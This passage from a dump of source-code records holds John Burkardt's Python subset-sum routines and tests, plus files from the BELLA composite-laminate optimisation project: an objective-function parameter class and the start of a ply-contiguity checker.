9, 30, 21, 19 ] )\r\n t = 50\r\n count = subset_sum_count_test ( n, w, t )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_COUNT_TESTS:' )\r\n print ( ' Normal end of execution.' )\r\n return\r\n\r\ndef subset_sum_find ( n, w, t ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_FIND seeks a subset of a set that has a given sum.\r\n#\r\n# Discussion:\r\n#\r\n# This function tries to compute a target value as the sum of\r\n# a selected subset of a given set of weights.\r\n#\r\n# This function works by brute force, that is, it tries every\r\n# possible subset to see if it sums to the desired value.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), a set of weights.\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Output, bool S(N), the indices of the weights used to make the combination.\r\n#\r\n import numpy as np\r\n from sys import exit\r\n\r\n s = np.zeros ( n, dtype = np.bool )\r\n s2 = np.zeros ( n, dtype = np.bool )\r\n rank = -1\r\n\r\n while ( True ):\r\n\r\n s2, rank = subset_next ( n, s2, rank )\r\n\r\n if ( rank == -1 ):\r\n break\r\n\r\n t2 = 0\r\n for i in range ( 0, n ):\r\n if ( s2[i] ):\r\n t2 = t2 + w[i]\r\n\r\n if ( t2 == t ):\r\n for i in range ( 0, n ):\r\n s[i] = s2[i]\r\n return s\r\n\r\n return s\r\n\r\ndef subset_sum_find_test ( n, w, t ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_FIND_TEST tests SUBSET_SUM_FIND.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), a set of weights.\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_FIND_TEST:' )\r\n print ( ' SUBSET_SUM_FIND seeks a subset of W that sums to T.' 
)\r\n print ( '' )\r\n print ( ' Target value T = %d' % ( t ) )\r\n print ( '' )\r\n print ( ' I W(I)' )\r\n print ( '' )\r\n for i in range ( 0, n ):\r\n print ( ' %2d %8d' % ( i, w[i] ) )\r\n\r\n c = subset_sum_find ( n, w, t )\r\n\r\n m = 0\r\n for i in range ( 0, n ):\r\n if ( c[i] ):\r\n m = m + 1\r\n\r\n print ( '' )\r\n\r\n if ( m == 0 ):\r\n print ( ' No solution was found.' )\r\n else:\r\n print ( ' %d = ' % ( t ) ),\r\n for i in range ( 0, n ):\r\n if ( c[i] ):\r\n print ( ' + %d' % ( w[i] ) ),\r\n print ( '' )\r\n\r\n return\r\n\r\ndef subset_sum_find_tests ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_FIND_TESTS tests SUBSET_SUM_FIND_TEST.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 10 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_FIND_TESTS:' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' SUBSET_SUM_FIND_TEST calls SUBSET_SUM_FIND with a' )\r\n print ( ' particular set of weights and target.' )\r\n#\r\n# Problem #1.\r\n#\r\n n = 8\r\n w = np.array ( [ 15, 22, 14, 26, 32, 9, 16, 8 ] )\r\n t = 53\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #2.\r\n#\r\n n = 10\r\n w = np.array ( [ 267, 493, 869, 961, 1000, 1153, 1246, 1598, 1766, 1922 ] )\r\n t = 5842\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #3.\r\n#\r\n n = 21\r\n w = np.array ( [ \\\r\n 518533, 1037066, 2074132, 1648264, 796528, \\\r\n 1593056, 686112, 1372224, 244448, 488896, \\\r\n 977792, 1955584, 1411168, 322336, 644672, \\\r\n 1289344, 78688, 157376, 314752, 629504, \\\r\n 1259008 ] )\r\n t = 2463098\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #4.\r\n#\r\n n = 10\r\n w = np.array ( [ 41, 34, 21, 20, 8, 7, 7, 4, 3, 3 ] )\r\n t = 50\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #5.\r\n#\r\n n = 9\r\n w = np.array ( [ 81, 80, 43, 40, 30, 26, 12, 11, 9 ] )\r\n t = 100\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #6.\r\n#\r\n n = 6\r\n w = np.array ( [ 1, 2, 4, 8, 16, 32 ] )\r\n t = 22\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Problem #7.\r\n#\r\n n = 10\r\n w = np.array ( [ 25, 27, 3, 12, 6, 15, 9, 30, 21, 19 ] )\r\n t = 50\r\n subset_sum_find_test ( n, w, t )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_FIND_TESTS:' )\r\n print ( ' Normal end of execution.' 
)\r\n return\r\n\r\ndef subset_sum_next ( s, n, v, more, u, t ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_NEXT seeks, one at a time, subsets of V that sum to S.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 16 July 2017\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer S, the desired sum.\r\n#\r\n# Input, integer N, the number of values.\r\n#\r\n# Input, integer V(N), the values.\r\n# These must be nonnegative, and sorted in ascending order.\r\n# Duplicate values are allowed.\r\n#\r\n# Input, logical MORE, should be set to FALSE before the first call.\r\n# Thereafter, it should be the output value of the previous call.\r\n#\r\n# Input, integer U(N), should be set to 0 before the first call.\r\n# Thereafter, it should be the output value of the previous call.\r\n#\r\n# Input, integer T, should be set to 0 before the first call.\r\n# Thereafter, it should be the output value of the previous call.\r\n#\r\n# Output, logical MORE, is TRUE if a new solution has been returned in U.\r\n# Process this solution, and call again if more solutions should be sought.\r\n#\r\n# Output, integer U(N), if MORE is true, U indexes the solution values.\r\n#\r\n# Output, integer T, if MORE is true, T is the highest index of the selected values.\r\n#\r\n import numpy as np\r\n\r\n if ( not more ):\r\n\r\n t = -1\r\n u = np.zeros ( n )\r\n\r\n else:\r\n\r\n more = False\r\n u[t] = 0\r\n\r\n t = backup_one ( n, u, t )\r\n\r\n if ( t < 0 ):\r\n return more, u, t\r\n\r\n u[t] = 0\r\n t = t + 1\r\n u[t] = 1\r\n\r\n while ( True ):\r\n\r\n su = np.dot ( u, v )\r\n\r\n if ( su < s and t < n - 1 ):\r\n\r\n t = t + 1\r\n u[t] = 1\r\n\r\n else:\r\n\r\n if ( su == s ):\r\n more = True;\r\n return more, u, t\r\n\r\n u[t] = 0\r\n\r\n t = backup_one ( n, u, t )\r\n\r\n if ( t < 0 ):\r\n break\r\n\r\n u[t] = 0\r\n t = t + 1\r\n u[t] = 1\r\n\r\n return more, u, t\r\n\r\ndef subset_sum_next_test ( s, n, v ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_NEXT_TEST tests the SUBSET_SUM_NEXT library.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 16 July 2017\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer S, the desired sum.\r\n#\r\n# Input, integer N, the number of values.\r\n#\r\n# Input, integer V(N), the values.\r\n# These must be nonnegative, and sorted in ascending order.\r\n# Duplicate values are allowed.\r\n#\r\n import numpy as np\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_NEXT_TEST:' )\r\n print ( ' SUBSET_SUM_NEXT finds the \"next\" subset of the values' )\r\n print ( ' which sum to the desired total S.' 
)\r\n\r\n more = False\r\n u = np.zeros ( n )\r\n t = 0\r\n\r\n print ( '' )\r\n print ( ' Desired sum S = %d' % ( s ) )\r\n print ( ' Number of targets = %d' % ( n ) )\r\n print ( ' Targets:' ),\r\n for i in range ( 0, n ):\r\n print ( ' %d' % ( v[i] ) ),\r\n print ( '' )\r\n print ( '' )\r\n\r\n k = 0\r\n\r\n while ( True ):\r\n more, u, t = subset_sum_next ( s, n, v, more, u, t )\r\n if ( not more ):\r\n break\r\n k = k + 1\r\n print ( ' %d: %d = ' % ( k, s ) ),\r\n plus = False\r\n for i in range ( 0, n ):\r\n if ( u[i] != 0 ):\r\n if ( plus ):\r\n print ( '+' ),\r\n print ( '%d' % ( v[i] ) ),\r\n plus = True\r\n print ( '' )\r\n\r\n return\r\n\r\ndef subset_sum_next_tests ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_NEXT_TESTS calls SUBSET_SUM_NEXT_TEST with various values.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 16 July 2017\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_NEXT_TESTS:' )\r\n print ( ' SUBSET_SUM_NEXT_TEST solves the subset sum problem' )\r\n print ( ' for specific values of S, N and V.' )\r\n\r\n s = 9\r\n n = 5\r\n v = np.array ( [ 1, 2, 3, 5, 7 ] )\r\n subset_sum_next_test ( s, n, v )\r\n\r\n s = 8\r\n n = 9\r\n v = np.array ( [ 1, 2, 3, 4, 5, 6, 7, 8, 9 ] )\r\n subset_sum_next_test ( s, n, v )\r\n#\r\n# What happens with a repeated target?\r\n#\r\n s = 8\r\n n = 9\r\n v = np.array ( [ 1, 2, 3, 3, 5, 6, 7, 8, 9 ] )\r\n subset_sum_next_test ( s, n, v )\r\n#\r\n# What happens with a target that needs all the values?\r\n#\r\n s = 18\r\n n = 5\r\n v = np.array ( [ 1, 2, 3, 5, 7 ] )\r\n subset_sum_next_test ( s, n, v )\r\n#\r\n# A larger S.\r\n#\r\n s = 5842\r\n n = 10\r\n v = np.array ( [ 267, 493, 869, 961, 1000, 1153, 1246, 1598, 1766, 1922 ] )\r\n subset_sum_next_test ( s, n, v )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_NEXT_TESTS:' )\r\n print ( ' Normal end of execution.' )\r\n\r\n return\r\n\r\ndef subset_sum_table ( t, n, w ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_TABLE sets a subset sum table.\r\n#\r\n# Discussion:\r\n#\r\n# The subset sum problem seeks to construct the value T by summing a\r\n# subset of the values W.\r\n#\r\n# This function seeks a solution by constructing a table TABLE of length T,\r\n# so that TABLE(I) = J means that the sum I can be constructed, and that\r\n# the last member of the sum is an entry of W equal to J.\r\n#\r\n# Example:\r\n#\r\n# w = [ 1, 2, 4, 8, 16, 32 ]\r\n# t = 22\r\n#\r\n# table = subset_sum ( w, t, r )\r\n# table = [ 1, 2, 2, 4, 4, 4, 4, 8, 8, 8, 8, 8, 8, 8, 8,\r\n# 16, 16, 16, 16, 16, 16, 16 ]\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 11 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), the weights.\r\n#\r\n# Output, integer TABLE(T+1), the subset sum table. TABLE(I) is 0 if the\r\n# target value I cannot be formed. 
It is J if the value I can be formed,\r\n# with the last term in the sum being the value J.\r\n#\r\n import numpy as np\r\n\r\n table = np.zeros ( t + 1, dtype = np.int32 )\r\n\r\n for i in range ( 0, n ):\r\n for j in range ( t - w[i], -1, -1 ):\r\n\r\n if ( j == 0 ):\r\n if ( table[w[i]] == 0 ):\r\n table[w[i]] = w[i]\r\n elif ( table[j] != 0 and table[j+w[i]] == 0 ):\r\n table[j+w[i]] = w[i]\r\n\r\n return table\r\n\r\ndef subset_sum_table_test ( t, n, w ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_TABLE_TEST tests SUBSET_SUM_TABLE.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 09 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Input, integer N, the number of weights.\r\n#\r\n# Input, integer W(N), a set of weights.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_TABLE_TEST:' )\r\n print ( ' SUBSET_SUM_TABLE seeks a subset of W that sums to T.' )\r\n print ( '' )\r\n print ( ' Target value T = %d' % ( t ) )\r\n print ( '' )\r\n print ( ' I W(I)' )\r\n print ( '' )\r\n for i in range ( 0, n ):\r\n print ( ' %2d %8d' % ( i, w[i] ) )\r\n\r\n table = subset_sum_table ( t, n, w )\r\n\r\n print ( '' )\r\n\r\n if ( table[t] == 0 ):\r\n print ( ' No solution was found.' )\r\n else:\r\n m, list = subset_sum_table_to_list ( t, table )\r\n print ( ' %d =' % ( t ) ),\r\n for i in range ( 0, m ):\r\n if ( 0 < i ):\r\n print ( '+' ),\r\n print ( '%d' % ( list[i] ) ),\r\n print ( '' )\r\n\r\n return\r\n\r\ndef subset_sum_table_tests ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_TABLE_TESTS tests SUBSET_SUM_TABLE_TEST.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 11 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import numpy as np\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_TABLE_TESTS:' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' SUBSET_SUM_TABLE_TEST calls SUBSET_SUM_TABLE with a' )\r\n print ( ' particular set of weights and target.' 
)\r\n#\r\n# Problem #1.\r\n#\r\n t = 53\r\n n = 8\r\n w = np.array ( [ 15, 22, 14, 26, 32, 9, 16, 8 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #2.\r\n#\r\n t = 5842\r\n n = 10\r\n w = np.array ( [ 267, 493, 869, 961, 1000, 1153, 1246, 1598, 1766, 1922 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #3.\r\n#\r\n t = 2463098\r\n n = 21\r\n w = np.array ( [ \\\r\n 518533, 1037066, 2074132, 1648264, 796528, \\\r\n 1593056, 686112, 1372224, 244448, 488896, \\\r\n 977792, 1955584, 1411168, 322336, 644672, \\\r\n 1289344, 78688, 157376, 314752, 629504, \\\r\n 1259008 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #4.\r\n#\r\n t = 50\r\n n = 10\r\n w = np.array ( [ 41, 34, 21, 20, 8, 7, 7, 4, 3, 3 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #5.\r\n#\r\n t = 100\r\n n = 9\r\n w = np.array ( [ 81, 80, 43, 40, 30, 26, 12, 11, 9 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #6.\r\n#\r\n t = 22\r\n n = 6\r\n w = np.array ( [ 1, 2, 4, 8, 16, 32 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Problem #7.\r\n#\r\n t = 50\r\n n = 10\r\n w = np.array ( [ 25, 27, 3, 12, 6, 15, 9, 30, 21, 19 ] )\r\n subset_sum_table_test ( t, n, w )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_TABLE_TESTS:' )\r\n print ( ' Normal end of execution.' )\r\n return\r\n\r\ndef subset_sum_table_to_list ( t, table ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_TABLE_TO_LIST converts a subset sum table to a list.\r\n#\r\n# Discussion:\r\n#\r\n# The subset sum problem seeks to construct the value T by summing a\r\n# subset of the values W.\r\n#\r\n# This function takes a table computed by subset_sum_table() and converts\r\n# it to the corresponding list of values that form the sum.\r\n#\r\n# Example:\r\n#\r\n# w = [ 1, 2, 4, 8, 16, 32 ]\r\n# t = 22\r\n#\r\n# table = subset_sum ( w, t, r )\r\n# table = [ 1, 2, 2, 4, 4, 4, 4, 8, 8, 8, 8, 8, 8, 8, 8,\r\n# 16, 16, 16, 16, 16, 16, 16 ]\r\n#\r\n# index = subset_sum_table_to_list ( t, table )\r\n# index = [ 2, 4, 16 ]\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 11 November 2015\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# Input, integer T, the target value.\r\n#\r\n# Input, integer TABLE(T), the subset sum table.\r\n#\r\n# Output, integer M, the number of items in the list.\r\n#\r\n# Output, integer INDEX(M), the list of weights that form the sum.\r\n# If no solution was found, then INDEX is an empty list.\r\n#\r\n index = []\r\n\r\n m = 0\r\n i = t\r\n while ( 0 < i ):\r\n index.append ( table[i] )\r\n i = i - table[i]\r\n m = m + 1\r\n\r\n return m, index\r\n\r\ndef timestamp ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## TIMESTAMP prints the date as a timestamp.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 06 April 2013\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# Parameters:\r\n#\r\n# None\r\n#\r\n import time\r\n\r\n t = time.time ( )\r\n print ( time.ctime ( t ) )\r\n\r\n return None\r\n\r\ndef timestamp_test ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## TIMESTAMP_TEST tests TIMESTAMP.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 03 December 2014\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n# 
Parameters:\r\n#\r\n# None\r\n#\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'TIMESTAMP_TEST:' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' TIMESTAMP prints a timestamp of the current date and time.' )\r\n print ( '' )\r\n\r\n timestamp ( )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'TIMESTAMP_TEST:' )\r\n print ( ' Normal end of execution.' )\r\n return\r\n\r\ndef subset_sum_test ( ):\r\n\r\n#*****************************************************************************80\r\n#\r\n## SUBSET_SUM_TEST tests the SUBSET_SUM library.\r\n#\r\n# Licensing:\r\n#\r\n# I don't care what you do with this code.\r\n#\r\n# Modified:\r\n#\r\n# 16 July 2017\r\n#\r\n# Author:\r\n#\r\n# John Burkardt\r\n#\r\n import platform\r\n\r\n print ( '' )\r\n print ( 'SUBSET_SUM_TEST:' )\r\n print ( ' Python version: %s' % ( platform.python_version ( ) ) )\r\n print ( ' Test the SUBSET_SUM library.' )\r\n\r\n# subset_next_test ( )\r\n# subset_sum_count_tests ( )\r\n subset_sum_find_tests ( )\r\n# subset_sum_next_tests ( )\r\n# subset_sum_table_tests ( )\r\n#\r\n# Terminate.\r\n#\r\n print ( '' )\r\n print ( 'SUBSET_SUM_TEST:' )\r\n print ( ' Normal end of execution.' )\r\n return\r\n\r\nif ( __name__ == '__main__' ):\r\n timestamp ( )\r\n subset_sum_test ( )\r\n timestamp ( )\r\n\r\n"
},
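The `subset_sum_table` function in the record above is the heart of the file: it fills a dynamic-programming table in which `table[i]` stores the last weight used to reach the sum `i`, with 0 marking unreachable sums. The following condensed, plain-Python restatement of that logic is for illustration only; note that it avoids the `dtype = np.bool` arguments used in the file, since the `np.bool` alias was removed in NumPy 1.24.

    :::python
    # Condensed restatement of the subset_sum_table idea from the record above.
    # table[s] holds the last weight used to reach sum s, or 0 if unreachable.
    def subset_sum_table(t, w):
        table = [0] * (t + 1)
        for wi in w:
            # sweep downwards so each weight is used at most once
            for j in range(t - wi, -1, -1):
                if j == 0:
                    if table[wi] == 0:
                        table[wi] = wi
                elif table[j] != 0 and table[j + wi] == 0:
                    table[j + wi] = wi
        return table

    def table_to_list(t, table):
        # walk back from the target, peeling off the last weight each time
        subset = []
        while 0 < t and table[t] != 0:
            subset.append(table[t])
            t -= table[t]
        return subset

    table = subset_sum_table(22, [1, 2, 4, 8, 16, 32])
    print(table_to_list(22, table))  # prints [16, 4, 2]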
{
"alpha_fraction": 0.5677981376647949,
"alphanum_fraction": 0.5810492038726807,
"avg_line_length": 33.08917236328125,
"blob_id": "c0cb0867822a4a19e57c07239540be7ff92a8ab4",
"content_id": "ee4a89f05be6cc3381fe55b174d9be4797b4cf03",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5509,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 157,
"path": "/src/BELLA/obj_function.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nClass for the objective function parameters\r\n\"\"\"\r\n__version__ = '1.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\n\r\nclass ObjFunction():\r\n \" An object for storing the objective function parameters\"\r\n\r\n def __init__(\r\n self,\r\n constraints,\r\n coeff_diso=0,\r\n coeff_contig=0,\r\n coeff_10=0,\r\n coeff_bal_ipo=1,\r\n coeff_oopo=1,\r\n coeff_spacing=1,\r\n n_modes=1):\r\n \"Initialise the objective function parameters\"\r\n\r\n # number of buckling modes to be tested\r\n self.n_modes = n_modes\r\n if not isinstance(n_modes, int):\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nAttention, n_modes must be an integer!\"\"\")\r\n if n_modes < 1:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nAttention, n_modes must be strictly positive!\"\"\")\r\n\r\n ### 10% rule\r\n if not constraints.rule_10_percent:\r\n self.coeff_10 = 0\r\n else:\r\n self.coeff_10 = coeff_10\r\n if not isinstance(coeff_10, (float, int)):\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nAttention, coeff_10 must be a number (float or integer)!\"\"\")\r\n if coeff_10 < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of penalty for the 10% rule must be a positive!\"\"\")\r\n\r\n ### balance\r\n if not constraints.bal:\r\n self.coeff_bal_ipo = 0\r\n else:\r\n self.coeff_bal_ipo = coeff_bal_ipo\r\n if not isinstance(coeff_bal_ipo, (float, int)):\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nAttention, coeff_bal_ipo must be a number (float or integer)!\"\"\")\r\n if coeff_bal_ipo < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of penalty for in-plane orthotropy must be a positive!\"\"\")\r\n\r\n ### out-of-plane orthotropy\r\n if not constraints.oopo:\r\n self.coeff_oopo = 0\r\n else:\r\n self.coeff_oopo = coeff_oopo\r\n if not isinstance(coeff_oopo, (float, int)):\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nAttention, coeff_oopo must be a number (float or integer)!\"\"\")\r\n if coeff_oopo < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of penalty for out-of-plane orthotropy must be a positive!\"\"\")\r\n\r\n ### contiguity rule\r\n if not constraints.contig:\r\n self.coeff_contig = 0\r\n else:\r\n self.coeff_contig = coeff_contig\r\n if coeff_contig < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of the contiguity constraint penalty must be a positive!\"\"\")\r\n\r\n ### disorientation rule\r\n if not constraints.diso:\r\n self.coeff_diso = 0\r\n else:\r\n self.coeff_diso = coeff_diso\r\n if coeff_diso < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of the disorientation constraint penalty must be a positive!\"\"\")\r\n\r\n\r\n ### ply drop spacing guideline\r\n if not constraints.pdl_spacing:\r\n self.coeff_spacing = 0\r\n else:\r\n self.coeff_spacing = coeff_spacing\r\n if not isinstance(coeff_spacing, (float, int)):\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of penalty for the ply drop spacing guideline must be a number!\"\"\")\r\n if coeff_spacing < 0:\r\n raise ObjFunctionDefinitionError(\"\"\"\r\nThe weight of penalty for the ply drop spacing guideline must be positive!\"\"\")\r\n\r\n# ### ply-drop guidelines\r\n# ### weight of the panel boundaries when calculating ply-drop layout\r\n# # penalties\r\n# # 1 for boundaries of level 1\r\n# # 1 - coeff for boundaries of level 2\r\n# # 1 - 2 * coeff for boundaries of level 3 ...\r\n# if not constraints.pdl_spacing:\r\n# self.coeff_panel_pdls = 0\r\n# else:\r\n# self.coeff_panel_pdls = 
coeff_panel_pdls\r\n\r\n\r\n def set_initial_panel_weightings(self, multipanel):\r\n \"\"\"\r\n to set the initial panel weightings\r\n \"\"\"\r\n self.reduced_panel_weightings \\\r\n = np.array([p.weighting for p in multipanel.reduced.panels])\r\n\r\n self.panel_weightings_ini \\\r\n = np.array([p.weighting for p in multipanel.panels])\r\n\r\n def __repr__(self):\r\n \" Display object \"\r\n\r\n return f\"\"\"\r\nNumber of buckling modes to be tested if buckling minimisation problem: {self.n_modes}\r\n\r\nPenalty coefficients:\r\n - for the disorientation rule: {self.coeff_diso}\r\n - for the contiguity rule: {self.coeff_contig}\r\n - for the 10% rule: {self.coeff_10}\r\n - for balance: {self.coeff_bal_ipo}\r\n - for out-of-plane orthotropy: {self.coeff_oopo}\r\n - for the ply drop spacing guideline: {self.coeff_spacing}\r\n\"\"\"\r\n# - for the weight of the panel boundaries when calculating ply-drop layout\r\n# penalties: {self.coeff_panel_pdls}\r\n\r\n\r\nclass ObjFunctionDefinitionError(Exception):\r\n \"\"\" Error during parameter definition\"\"\"\r\n\r\nif __name__ == \"__main__\":\r\n import sys\r\n sys.path.append(r'C:\\BELLA')\r\n from src.BELLA.constraints import Constraints\r\n constraints = Constraints(sym=True)\r\n constraints.bal = True\r\n constraints.oopo = True\r\n obj_func_param = ObjFunction(\r\n constraints=constraints,\r\n lampam_weightings=np.array([0, 1, 0, 1, 0, 1, 0, 1, 0, 1, 0, 1]),\r\n coeff_bal_ipo=1000,\r\n coeff_oopo=20)\r\n print(obj_func_param)\r\n"
},
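For reference, here is a hypothetical usage sketch for this `ObjFunction` class, assuming the `C:\BELLA` package layout used throughout the repository. As defined above, `__init__` accepts no `lampam_weightings` keyword, so the `__main__` demo at the bottom of the record would raise a `TypeError`; the call below passes only keyword arguments the constructor actually declares.

    :::python
    # Hypothetical usage sketch; assumes the src.BELLA package layout above.
    import sys
    sys.path.append(r'C:\BELLA')
    from src.BELLA.constraints import Constraints
    from src.BELLA.obj_function import ObjFunction

    constraints = Constraints(sym=True)
    constraints.bal = True
    constraints.oopo = True

    # Only keyword arguments declared by ObjFunction.__init__ are passed.
    obj_func_param = ObjFunction(constraints=constraints,
                                 coeff_bal_ipo=1000,
                                 coeff_oopo=20)
    print(obj_func_param)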
{
"alpha_fraction": 0.3899224102497101,
"alphanum_fraction": 0.4085257649421692,
"avg_line_length": 36.31182861328125,
"blob_id": "3f8c8a6b944484e6e796e952da9e18a381f4a7ad",
"content_id": "a22a35f2e70a3d4d57f087711ede517885735326",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10697,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 279,
"path": "/src/guidelines/internal_contig.py",
"repo_name": "noemiefedon/BELLA",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nFunction to check the feasibility of laminate lay-ups for the contiguity design\r\nguideline.\r\n\"\"\"\r\n__version__ = '2.0'\r\n__author__ = 'Noemie Fedon'\r\n\r\nimport numpy as np\r\n\r\ndef internal_contig2(stack, constraints):\r\n '''\r\n returns True if a laminate lay-up staisfy the contiguity design guideline,\r\n False otherwise\r\n\r\n INPUTS\r\n\r\n - stack: the laminate stacking sequence\r\n - constraints: the set of constraints\r\n '''\r\n if stack.ndim == 2:\r\n stack = stack.reshape((stack.size, ))\r\n\r\n if not constraints.contig:\r\n return True\r\n\r\n if constraints.n_contig < stack.size:\r\n diff = stack.size - constraints.n_contig\r\n\r\n if constraints.n_contig == 2:\r\n for jj in np.arange(diff):\r\n if stack[jj]==stack[jj + 1] \\\r\n and stack[jj]==stack[jj + 2]:\r\n return False\r\n\r\n elif constraints.n_contig == 3:\r\n for jj in np.arange(diff):\r\n if stack[jj]==stack[jj + 1] \\\r\n and stack[jj]==stack[jj + 2] \\\r\n and stack[jj]==stack[jj + 3]:\r\n return False\r\n\r\n elif constraints.n_contig == 4:\r\n for jj in np.arange(diff):\r\n if stack[jj]==stack[jj + 1] \\\r\n and stack[jj]==stack[jj + 2] \\\r\n and stack[jj]==stack[jj + 3] \\\r\n and stack[jj]==stack[jj + 4]:\r\n return False\r\n\r\n elif constraints.n_contig == 5:\r\n for jj in np.arange(diff):\r\n if stack[jj]==stack[jj + 1] \\\r\n and stack[jj]==stack[jj + 